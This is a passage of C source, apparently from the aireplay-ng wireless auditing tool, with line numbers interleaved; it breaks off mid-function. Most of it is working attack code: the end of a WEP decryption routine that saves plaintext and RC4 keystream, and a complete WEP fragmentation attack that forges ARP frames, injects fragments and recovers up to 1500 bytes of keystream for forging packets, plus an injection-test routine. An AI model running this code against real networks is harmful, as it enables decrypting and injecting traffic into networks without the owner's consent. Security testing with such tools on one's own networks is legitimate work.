h80211[1] &= 0xBF; /* remove the WEP bit, too */
3965
3966
/* save the decrypted packet */
3967
3968
gettimeofday( &tv, NULL );
3969
3970
pfh_out.magic = TCPDUMP_MAGIC;
3971
pfh_out.version_major = PCAP_VERSION_MAJOR;
3972
pfh_out.version_minor = PCAP_VERSION_MINOR;
3973
pfh_out.thiszone = 0;
3974
pfh_out.sigfigs = 0;
3975
pfh_out.snaplen = 65535;
3976
pfh_out.linktype = LINKTYPE_IEEE802_11;
3977
3978
pkh.tv_sec = tv.tv_sec;
3979
pkh.tv_usec = tv.tv_usec;
3980
pkh.caplen = caplen;
3981
pkh.len = caplen;
3982
3983
lt = localtime( (const time_t *) &tv.tv_sec );
3984
3985
memset( strbuf, 0, sizeof( strbuf ) );
3986
snprintf( strbuf, sizeof( strbuf ) - 1,
3987
"replay_dec-%02d%02d-%02d%02d%02d.cap",
3988
lt->tm_mon + 1, lt->tm_mday,
3989
lt->tm_hour, lt->tm_min, lt->tm_sec );
3990
3991
printf( "\nSaving plaintext in %s\n", strbuf );
3992
3993
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
3994
{
3995
perror( "fopen failed" );
3996
return( 1 );
3997
}
3998
3999
n = sizeof( struct pcap_file_header );
4000
4001
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
4002
{
4003
perror( "fwrite failed\n" );
4004
return( 1 );
4005
}
4006
4007
n = sizeof( pkh );
4008
4009
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
4010
{
4011
perror( "fwrite failed" );
4012
return( 1 );
4013
}
4014
4015
n = pkh.caplen;
4016
4017
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
4018
{
4019
perror( "fwrite failed" );
4020
return( 1 );
4021
}
4022
4023
fclose( f_cap_out );
4024
4025
/* save the RC4 stream (xor mask) */
4026
4027
memset( strbuf, 0, sizeof( strbuf ) );
4028
snprintf( strbuf, sizeof( strbuf ) - 1,
4029
"replay_dec-%02d%02d-%02d%02d%02d.xor",
4030
lt->tm_mon + 1, lt->tm_mday,
4031
lt->tm_hour, lt->tm_min, lt->tm_sec );
4032
4033
printf( "Saving keystream in %s\n", strbuf );
4034
4035
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
4036
{
4037
perror( "fopen failed" );
4038
return( 1 );
4039
}
4040
4041
n = pkh.caplen + 8 - 24;
4042
4043
if( fwrite( chopped + 24, n, 1, f_cap_out ) != 1 )
4044
{
4045
perror( "fwrite failed" );
4046
return( 1 );
4047
}
4048
4049
fclose( f_cap_out );
4050
4051
printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
4052
(long) time( NULL ) - tt,
4053
(float) ( pkh.caplen - 6 - 24 ) /
4054
(float) ( time( NULL ) - tt ) );
4055
4056
return( 0 );
4057
}
4058
4059
int make_arp_request(uchar *h80211, uchar *bssid, uchar *src_mac, uchar *dst_mac, uchar *src_ip, uchar *dst_ip, int size)
4060
{
4061
uchar *arp_header = (unsigned char*)"\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01";
4062
uchar *header80211 = (unsigned char*)"\x08\x41\x95\x00";
4063
4064
// 802.11 part
4065
memcpy(h80211, header80211, 4);
4066
memcpy(h80211+4, bssid, 6);
4067
memcpy(h80211+10, src_mac, 6);
4068
memcpy(h80211+16, dst_mac, 6);
4069
h80211[22] = '\x00';
4070
h80211[23] = '\x00';
4071
4072
// ARP part
4073
memcpy(h80211+24, arp_header, 16);
4074
memcpy(h80211+40, src_mac, 6);
4075
memcpy(h80211+46, src_ip, 4);
4076
memset(h80211+50, '\x00', 6);
4077
memcpy(h80211+56, dst_ip, 4);
4078
4079
// Insert padding bytes
4080
memset(h80211+60, '\x00', size-60);
4081
4082
return 0;
4083
}
4084
4085
void save_prga(char *filename, uchar *iv, uchar *prga, int prgalen)
4086
{
4087
FILE *xorfile;
4088
size_t unused;
4089
xorfile = fopen(filename, "wb");
4090
unused = fwrite (iv, 1, 4, xorfile);
4091
unused = fwrite (prga, 1, prgalen, xorfile);
4092
fclose (xorfile);
4093
}
4094
4095
int do_attack_fragment()
4096
{
4097
uchar packet[4096];
4098
uchar packet2[4096];
4099
uchar prga[4096];
4100
uchar iv[4];
4101
4102
// uchar ack[14] = "\xd4";
4103
4104
char strbuf[256];
4105
4106
struct tm *lt;
4107
struct timeval tv, tv2;
4108
4109
int done;
4110
int caplen;
4111
int caplen2;
4112
int arplen;
4113
int round;
4114
int prga_len;
4115
int isrelay;
4116
int again;
4117
int length;
4118
int ret;
4119
int gotit;
4120
int acksgot;
4121
int packets;
4122
int z;
4123
4124
uchar *snap_header = (unsigned char*)"\xAA\xAA\x03\x00\x00\x00\x08\x00";
4125
4126
done = caplen = caplen2 = arplen = round = 0;
4127
prga_len = isrelay = gotit = again = length = 0;
4128
4129
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
4130
{
4131
printf( "Please specify a source MAC (-h).\n" );
4132
return( 1 );
4133
}
4134
4135
if(getnet(NULL, 1, 1) != 0)
4136
return 1;
4137
4138
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
4139
{
4140
memset( opt.r_dmac, '\xFF', 6);
4141
opt.r_dmac[5] = 0xED;
4142
}
4143
4144
if( memcmp( opt.r_sip, NULL_MAC, 4 ) == 0 )
4145
{
4146
memset( opt.r_sip, '\xFF', 4);
4147
}
4148
4149
if( memcmp( opt.r_dip, NULL_MAC, 4 ) == 0 )
4150
{
4151
memset( opt.r_dip, '\xFF', 4);
4152
}
4153
4154
PCT; printf ("Waiting for a data packet...\n");
4155
4156
while(!done) //
4157
{
4158
round = 0;
4159
4160
if( capture_ask_packet( &caplen, 0 ) != 0 )
4161
return -1;
4162
4163
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
4164
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
4165
z+=2;
4166
4167
if((unsigned)caplen > sizeof(packet) || (unsigned)caplen > sizeof(packet2))
4168
continue;
4169
4170
memcpy( packet2, h80211, caplen );
4171
caplen2 = caplen;
4172
PCT; printf("Data packet found!\n");
4173
4174
if ( memcmp( packet2 + 4, SPANTREE, 6 ) == 0 ||
4175
memcmp( packet2 + 16, SPANTREE, 6 ) == 0 )
4176
{
4177
packet2[z+4] = ((packet2[z+4] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4178
packet2[z+5] = ((packet2[z+5] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4179
packet2[z+10] = ((packet2[z+10] ^ 0x00) ^ 0x08); //0x00 instead of 0x08
4180
}
4181
4182
prga_len = 7;
4183
4184
again = RETRY;
4185
4186
memcpy( packet, packet2, caplen2 );
4187
caplen = caplen2;
4188
memcpy(prga, packet+z+4, prga_len);
4189
memcpy(iv, packet+z, 4);
4190
4191
xor_keystream(prga, snap_header, prga_len);
4192
4193
while(again == RETRY) //sending 7byte fragments
4194
{
4195
again = 0;
4196
4197
arplen=60;
4198
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4199
4200
if ((round % 2) == 1)
4201
{
4202
PCT; printf("Trying a LLC NULL packet\n");
4203
memset(h80211+24, '\x00', 39);
4204
arplen=63;
4205
}
4206
4207
acksgot=0;
4208
packets=(arplen-24)/(prga_len-4);
4209
if( (arplen-24)%(prga_len-4) != 0 )
4210
packets++;
4211
4212
PCT; printf("Sending fragmented packet\n");
4213
send_fragments(h80211, arplen, iv, prga, prga_len-4, 0);
4214
// //Plus an ACK
4215
// send_packet(ack, 10);
4216
4217
gettimeofday( &tv, NULL );
4218
4219
4220
while (!gotit) //waiting for relayed packet
4221
{
4222
caplen = read_packet(packet, sizeof(packet), NULL);
4223
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4224
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4225
z+=2;
4226
4227
if (packet[0] == 0xD4 )
4228
{
4229
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4230
{
4231
acksgot++;
4232
}
4233
continue;
4234
}
4235
4236
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4237
{
4238
if ( (packet[1] & 2) ) //Is a FromDS packet
4239
{
4240
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4241
{
4242
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4243
{
4244
if (caplen-z < 66) //Is short enough
4245
{
4246
//This is our relayed packet!
4247
PCT; printf("Got RELAYED packet!!\n");
4248
gotit = 1;
4249
isrelay = 1;
4250
}
4251
}
4252
}
4253
}
4254
}
4255
4256
/* check if we got an deauthentication packet */
4257
4258
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4259
{
4260
PCT; printf( "Got a deauthentication packet!\n" );
4261
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4262
}
4263
4264
/* check if we got an disassociation packet */
4265
4266
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4267
{
4268
PCT; printf( "Got a disassociation packet!\n" );
4269
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4270
}
4271
4272
gettimeofday( &tv2, NULL );
4273
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4274
{
4275
PCT; printf("Not enough acks, repeating...\n");
4276
again = RETRY;
4277
break;
4278
}
4279
4280
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4281
{
4282
PCT; printf("No answer, repeating...\n");
4283
round++;
4284
again = RETRY;
4285
if (round > 10)
4286
{
4287
PCT; printf("Still nothing, trying another packet...\n");
4288
again = NEW_IV;
4289
}
4290
break;
4291
}
4292
}
4293
}
4294
4295
if(again == NEW_IV) continue;
4296
4297
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 60);
4298
if (caplen-z == 68-24)
4299
{
4300
//Thats the ARP packet!
4301
// PCT; printf("Thats our ARP packet!\n");
4302
}
4303
if (caplen-z == 71-24)
4304
{
4305
//Thats the LLC NULL packet!
4306
// PCT; printf("Thats our LLC Null packet!\n");
4307
memset(h80211+24, '\x00', 39);
4308
}
4309
4310
if (! isrelay)
4311
{
4312
//Building expected cleartext
4313
uchar ct[4096] = "\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02";
4314
//Ethernet & ARP header
4315
4316
//Followed by the senders MAC and IP:
4317
memcpy(ct+16, packet+16, 6);
4318
memcpy(ct+22, opt.r_dip, 4);
4319
4320
//And our own MAC and IP:
4321
memcpy(ct+26, opt.r_smac, 6);
4322
memcpy(ct+32, opt.r_sip, 4);
4323
4324
//Calculating
4325
memcpy(prga, packet+z+4, 36);
4326
xor_keystream(prga, ct, 36);
4327
}
4328
else
4329
{
4330
memcpy(prga, packet+z+4, 36);
4331
xor_keystream(prga, h80211+24, 36);
4332
}
4333
4334
memcpy(iv, packet+z, 4);
4335
round = 0;
4336
again = RETRY;
4337
while(again == RETRY)
4338
{
4339
again = 0;
4340
4341
PCT; printf("Trying to get 384 bytes of a keystream\n");
4342
4343
arplen=408;
4344
4345
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4346
if ((round % 2) == 1)
4347
{
4348
PCT; printf("Trying a LLC NULL packet\n");
4349
memset(h80211+24, '\x00', arplen+8);
4350
arplen+=32;
4351
}
4352
4353
acksgot=0;
4354
packets=(arplen-24)/(32);
4355
if( (arplen-24)%(32) != 0 )
4356
packets++;
4357
4358
send_fragments(h80211, arplen, iv, prga, 32, 0);
4359
// //Plus an ACK
4360
// send_packet(ack, 10);
4361
4362
gettimeofday( &tv, NULL );
4363
4364
gotit=0;
4365
while (!gotit) //waiting for relayed packet
4366
{
4367
caplen = read_packet(packet, sizeof(packet), NULL);
4368
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4369
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4370
z+=2;
4371
4372
if (packet[0] == 0xD4 )
4373
{
4374
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4375
acksgot++;
4376
continue;
4377
}
4378
4379
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4380
{
4381
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4382
{
4383
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4384
{
4385
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4386
{
4387
if (caplen-z > 400-24 && caplen-z < 500-24) //Is short enough
4388
{
4389
//This is our relayed packet!
4390
PCT; printf("Got RELAYED packet!!\n");
4391
gotit = 1;
4392
isrelay = 1;
4393
}
4394
}
4395
}
4396
}
4397
}
4398
4399
/* check if we got an deauthentication packet */
4400
4401
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4402
{
4403
PCT; printf( "Got a deauthentication packet!\n" );
4404
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4405
}
4406
4407
/* check if we got an disassociation packet */
4408
4409
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4410
{
4411
PCT; printf( "Got a disassociation packet!\n" );
4412
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4413
}
4414
4415
gettimeofday( &tv2, NULL );
4416
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4417
{
4418
PCT; printf("Not enough acks, repeating...\n");
4419
again = RETRY;
4420
break;
4421
}
4422
4423
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4424
{
4425
PCT; printf("No answer, repeating...\n");
4426
round++;
4427
again = RETRY;
4428
if (round > 10)
4429
{
4430
PCT; printf("Still nothing, trying another packet...\n");
4431
again = NEW_IV;
4432
}
4433
break;
4434
}
4435
}
4436
}
4437
4438
if(again == NEW_IV) continue;
4439
4440
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 408);
4441
if (caplen-z == 416-24)
4442
{
4443
//Thats the ARP packet!
4444
// PCT; printf("Thats our ARP packet!\n");
4445
}
4446
if (caplen-z == 448-24)
4447
{
4448
//Thats the LLC NULL packet!
4449
// PCT; printf("Thats our LLC Null packet!\n");
4450
memset(h80211+24, '\x00', 416);
4451
}
4452
4453
memcpy(iv, packet+z, 4);
4454
memcpy(prga, packet+z+4, 384);
4455
xor_keystream(prga, h80211+24, 384);
4456
4457
round = 0;
4458
again = RETRY;
4459
while(again == RETRY)
4460
{
4461
again = 0;
4462
4463
PCT; printf("Trying to get 1500 bytes of a keystream\n");
4464
4465
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 1500);
4466
arplen=1500;
4467
if ((round % 2) == 1)
4468
{
4469
PCT; printf("Trying a LLC NULL packet\n");
4470
memset(h80211+24, '\x00', 1508);
4471
arplen+=32;
4472
}
4473
4474
acksgot=0;
4475
packets=(arplen-24)/(300);
4476
if( (arplen-24)%(300) != 0 )
4477
packets++;
4478
4479
send_fragments(h80211, arplen, iv, prga, 300, 0);
4480
// //Plus an ACK
4481
// send_packet(ack, 10);
4482
4483
gettimeofday( &tv, NULL );
4484
4485
gotit=0;
4486
while (!gotit) //waiting for relayed packet
4487
{
4488
caplen = read_packet(packet, sizeof(packet), NULL);
4489
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4490
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4491
z+=2;
4492
4493
if (packet[0] == 0xD4 )
4494
{
4495
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4496
acksgot++;
4497
continue;
4498
}
4499
4500
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4501
{
4502
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4503
{
4504
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4505
{
4506
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4507
{
4508
if (caplen-z > 1496-24) //Is short enough
4509
{
4510
//This is our relayed packet!
4511
PCT; printf("Got RELAYED packet!!\n");
4512
gotit = 1;
4513
isrelay = 1;
4514
}
4515
}
4516
}
4517
}
4518
}
4519
4520
/* check if we got an deauthentication packet */
4521
4522
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4523
{
4524
PCT; printf( "Got a deauthentication packet!\n" );
4525
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4526
}
4527
4528
/* check if we got an disassociation packet */
4529
4530
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4531
{
4532
PCT; printf( "Got a disassociation packet!\n" );
4533
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4534
}
4535
4536
gettimeofday( &tv2, NULL );
4537
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4538
{
4539
PCT; printf("Not enough acks, repeating...\n");
4540
again = RETRY;
4541
break;
4542
}
4543
4544
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4545
{
4546
PCT; printf("No answer, repeating...\n");
4547
round++;
4548
again = RETRY;
4549
if (round > 10)
4550
{
4551
printf("Still nothing, quitting with 384 bytes? [y/n] \n");
4552
fflush( stdout );
4553
ret=0;
4554
while(!ret) ret = scanf( "%s", tmpbuf );
4555
4556
printf( "\n" );
4557
4558
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
4559
again = ABORT;
4560
else
4561
again = NEW_IV;
4562
}
4563
break;
4564
}
4565
}
4566
}
4567
4568
if(again == NEW_IV) continue;
4569
4570
if(again == ABORT) length = 408;
4571
else length = 1500;
4572
4573
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, length);
4574
if (caplen == length+8+z)
4575
{
4576
//Thats the ARP packet!
4577
// PCT; printf("Thats our ARP packet!\n");
4578
}
4579
if (caplen == length+16+z)
4580
{
4581
//Thats the LLC NULL packet!
4582
// PCT; printf("Thats our LLC Null packet!\n");
4583
memset(h80211+24, '\x00', length+8);
4584
}
4585
4586
if(again != ABORT)
4587
{
4588
memcpy(iv, packet+z, 4);
4589
memcpy(prga, packet+z+4, length);
4590
xor_keystream(prga, h80211+24, length);
4591
}
4592
4593
lt = localtime( (const time_t *) &tv.tv_sec );
4594
4595
memset( strbuf, 0, sizeof( strbuf ) );
4596
snprintf( strbuf, sizeof( strbuf ) - 1,
4597
"fragment-%02d%02d-%02d%02d%02d.xor",
4598
lt->tm_mon + 1, lt->tm_mday,
4599
lt->tm_hour, lt->tm_min, lt->tm_sec );
4600
save_prga(strbuf, iv, prga, length);
4601
4602
printf( "Saving keystream in %s\n", strbuf );
4603
printf("Now you can build a packet with packetforge-ng out of that %d bytes keystream\n", length);
4604
4605
done=1;
4606
4607
}
4608
4609
return( 0 );
4610
}
4611
4612
int grab_essid(uchar* packet, int len)
4613
{
4614
int i=0, j=0, pos=0, tagtype=0, taglen=0, chan=0;
4615
uchar bssid[6];
4616
4617
memcpy(bssid, packet+16, 6);
4618
taglen = 22; //initial value to get the fixed tags parsing started
4619
taglen+= 12; //skip fixed tags in frames
4620
do
4621
{
4622
pos += taglen + 2;
4623
tagtype = packet[pos];
4624
taglen = packet[pos+1];
4625
} while(tagtype != 3 && pos < len-2);
4626
4627
if(tagtype != 3) return -1;
4628
if(taglen != 1) return -1;
4629
if(pos+2+taglen > len) return -1;
4630
4631
chan = packet[pos+2];
4632
4633
pos=0;
4634
4635
taglen = 22; //initial value to get the fixed tags parsing started
4636
taglen+= 12; //skip fixed tags in frames
4637
do
4638
{
4639
pos += taglen + 2;
4640
tagtype = packet[pos];
4641
taglen = packet[pos+1];
4642
} while(tagtype != 0 && pos < len-2);
4643
4644
if(tagtype != 0) return -1;
4645
if(taglen > 250) taglen = 250;
4646
if(pos+2+taglen > len) return -1;
4647
4648
for(i=0; i<20; i++)
4649
{
4650
if( ap[i].set)
4651
{
4652
if( memcmp(bssid, ap[i].bssid, 6) == 0 ) //got it already
4653
{
4654
if(packet[0] == 0x50 && !ap[i].found)
4655
{
4656
ap[i].found++;
4657
}
4658
if(ap[i].chan == 0) ap[i].chan=chan;
4659
break;
4660
}
4661
}
4662
if(ap[i].set == 0)
4663
{
4664
for(j=0; j<taglen; j++)
4665
{
4666
if(packet[pos+2+j] < 32 || packet[pos+2+j] > 127)
4667
{
4668
return -1;
4669
}
4670
}
4671
4672
ap[i].set = 1;
4673
ap[i].len = taglen;
4674
memcpy(ap[i].essid, packet+pos+2, taglen);
4675
ap[i].essid[taglen] = '\0';
4676
memcpy(ap[i].bssid, bssid, 6);
4677
ap[i].chan = chan;
4678
if(packet[0] == 0x50) ap[i].found++;
4679
return 0;
4680
}
4681
}
4682
return -1;
4683
}
4684
4685
static int get_ip_port(char *iface, char *ip, const int ip_size)
4686
{
4687
char *host;
4688
char *ptr;
4689
int port = -1;
4690
struct in_addr addr;
4691
4692
host = strdup(iface);
4693
if (!host)
4694
return -1;
4695
4696
ptr = strchr(host, ':');
4697
if (!ptr)
4698
goto out;
4699
4700
*ptr++ = 0;
4701
4702
if (!inet_aton(host, (struct in_addr *)&addr))
4703
goto out; /* XXX resolve hostname */
4704
4705
if(strlen(host) > 15)
4706
{
4707
port = -1;
4708
goto out;
4709
}
4710
strncpy(ip, host, ip_size);
4711
port = atoi(ptr);
4712
if(port <= 0) port = -1;
4713
4714
out:
4715
free(host);
4716
return port;
4717
}
4718
4719
void dump_packet(unsigned char* packet, int len)
4720
{
4721
int i=0;
4722
4723
for(i=0; i<len; i++)
4724
{
4725
if(i>0 && i%4 == 0)printf(" ");
4726
if(i>0 && i%16 == 0)printf("\n");
4727
printf("%02X ", packet[i]);
4728
}
4729
printf("\n\n");
4730
}
4731
4732
struct net_hdr {
4733
uint8_t nh_type;
4734
uint32_t nh_len;
4735
uint8_t nh_data[0];
4736
} __packed;
4737
4738
int tcp_test(const char* ip_str, const short port)
4739
{
4740
int sock, i;
4741
struct sockaddr_in s_in;
4742
int packetsize = 1024;
4743
unsigned char packet[packetsize];
4744
struct timeval tv, tv2, tv3;
4745
int caplen = 0;
4746
int times[REQUESTS];
4747
int min, avg, max, len;
4748
struct net_hdr nh;
4749
4750
tv3.tv_sec=0;
4751
tv3.tv_usec=1;
4752
4753
s_in.sin_family = PF_INET;
4754
s_in.sin_port = htons(port);
4755
if (!inet_aton(ip_str, &s_in.sin_addr))
4756
return -1;
4757
4758
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4759
return -1;
4760
4761
/* avoid blocking on reading the socket */
4762
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4763
{
4764
perror( "fcntl(O_NONBLOCK) failed" );
4765
return( 1 );
4766
}
4767
4768
gettimeofday( &tv, NULL );
4769
4770
while (1) //waiting for relayed packet
4771
{
4772
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4773
{
4774
if(errno != EINPROGRESS && errno != EALREADY)
4775
{
4776
perror("connect");
4777
close(sock);
4778
4779
printf("Failed to connect\n");
4780
4781
return -1;
4782
}
4783
}
4784
else
4785
{
4786
gettimeofday( &tv2, NULL );
4787
break;
4788
}
4789
4790
gettimeofday( &tv2, NULL );
4791
//wait 3000ms for a successful connect
4792
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3000*1000))
4793
{
4794
printf("Connection timed out\n");
4795
close(sock);
4796
return(-1);
4797
}
4798
usleep(10);
4799
}
4800
4801
PCT; printf("TCP connection successful\n");
4802
4803
//trying to identify airserv-ng
4804
memset(&nh, 0, sizeof(nh));
4805
// command: GET_CHAN
4806
nh.nh_type = 2;
4807
nh.nh_len = htonl(0);
4808
4809
if (send(sock, &nh, sizeof(nh), 0) != sizeof(nh))
4810
{
4811
perror("send");
4812
return -1;
4813
}
4814
4815
gettimeofday( &tv, NULL );
4816
i=0;
4817
4818
while (1) //waiting for GET_CHAN answer
4819
{
4820
caplen = read(sock, &nh, sizeof(nh));
4821
4822
if(caplen == -1)
4823
{
4824
if( errno != EAGAIN )
4825
{
4826
perror("read");
4827
return -1;
4828
}
4829
}
4830
4831
if( (unsigned)caplen == sizeof(nh))
4832
{
4833
len = ntohl(nh.nh_len);
4834
if( nh.nh_type == 1 && i==0 )
4835
{
4836
i=1;
4837
caplen = read(sock, packet, len);
4838
if(caplen == len)
4839
{
4840
i=2;
4841
break;
4842
}
4843
else
4844
{
4845
i=0;
4846
}
4847
}
4848
else
4849
{
4850
caplen = read(sock, packet, len);
4851
}
4852
}
4853
4854
gettimeofday( &tv2, NULL );
4855
//wait 1000ms for an answer
4856
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4857
{
4858
break;
4859
}
4860
if(caplen == -1)
4861
usleep(10);
4862
}
4863
4864
if(i==2)
4865
{
4866
PCT; printf("airserv-ng found\n");
4867
}
4868
else
4869
{
4870
PCT; printf("airserv-ng NOT found\n");
4871
}
4872
4873
close(sock);
4874
4875
for(i=0; i<REQUESTS; i++)
4876
{
4877
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4878
return -1;
4879
4880
/* avoid blocking on reading the socket */
4881
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4882
{
4883
perror( "fcntl(O_NONBLOCK) failed" );
4884
return( 1 );
4885
}
4886
4887
usleep(1000);
4888
4889
gettimeofday( &tv, NULL );
4890
4891
while (1) //waiting for relayed packet
4892
{
4893
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4894
{
4895
if(errno != EINPROGRESS && errno != EALREADY)
4896
{
4897
perror("connect");
4898
close(sock);
4899
4900
printf("Failed to connect\n");
4901
4902
return -1;
4903
}
4904
}
4905
else
4906
{
4907
gettimeofday( &tv2, NULL );
4908
break;
4909
}
4910
4911
gettimeofday( &tv2, NULL );
4912
//wait 1000ms for a successful connect
4913
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4914
{
4915
break;
4916
}
4917
//simple "high-precision" usleep
4918
select(1, NULL, NULL, NULL, &tv3);
4919
}
4920
times[i] = ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec));
4921
printf( "\r%d/%d\r", i, REQUESTS);
4922
fflush(stdout);
4923
close(sock);
4924
}
4925
4926
min = INT_MAX;
4927
avg = 0;
4928
max = 0;
4929
4930
for(i=0; i<REQUESTS; i++)
4931
{
4932
if(times[i] < min) min = times[i];
4933
if(times[i] > max) max = times[i];
4934
avg += times[i];
4935
}
4936
avg /= REQUESTS;
4937
4938
PCT; printf("ping %s:%d (min/avg/max): %.3fms/%.3fms/%.3fms\n", ip_str, port, min/1000.0, avg/1000.0, max/1000.0);
4939
4940
return 0;
4941
}
4942
4943
int do_attack_test()
4944
{
4945
uchar packet[4096];
4946
struct timeval tv, tv2, tv3;
4947
int len=0, i=0, j=0, k=0;
4948
int gotit=0, answers=0, found=0;
4949
int caplen=0, essidlen=0;
4950
unsigned int min, avg, max;
4951
int ret=0;
4952
float avg2;
4953
struct rx_info ri;
4954
int atime=200; //time in ms to wait for answer packet (needs to be higher for airserv)
4955
unsigned char nulldata[1024];
4956
4957
if(opt.port_out > 0)
4958
{
4959
atime += 200;
4960
PCT; printf("Testing connection to injection device %s\n", opt.iface_out);
4961
ret = tcp_test(opt.ip_out, opt.port_out);
4962
if(ret != 0)
4963
{
4964
return( 1 );
4965
}
4966
printf("\n");
4967
4968
/* open the replay interface */
4969
_wi_out = wi_open(opt.iface_out);
4970
if (!_wi_out)
4971
return 1;
4972
printf("\n");
4973
dev.fd_out = wi_fd(_wi_out);
4974
wi_get_mac(_wi_out, dev.mac_out);
4975
if(opt.s_face == NULL)
4976
{
4977
_wi_in = _wi_out;
4978
dev.fd_in = dev.fd_out;
4979
4980
/* XXX */
4981
dev.arptype_in = dev.arptype_out;
4982
wi_get_mac(_wi_in, dev.mac_in);
4983
}
4984
}
4985
4986
if(opt.s_face && opt.port_in > 0)
4987
{
4988
atime += 200;
4989
PCT; printf("Testing connection to capture device %s\n", opt.s_face);
4990
ret = tcp_test(opt.ip_in, opt.port_in);
4991
if(ret != 0)
4992
{
4993
return( 1 );
4994
}
4995
printf("\n");
4996
4997
/* open the packet source */
4998
_wi_in = wi_open(opt.s_face);
4999
if (!_wi_in)
5000
return 1;
5001
dev.fd_in = wi_fd(_wi_in);
5002
wi_get_mac(_wi_in, dev.mac_in);
5003
printf("\n");
5004
}
5005
else if(opt.s_face && opt.port_in <= 0)
5006
{
5007
_wi_in = wi_open(opt.s_face);
5008
if (!_wi_in)
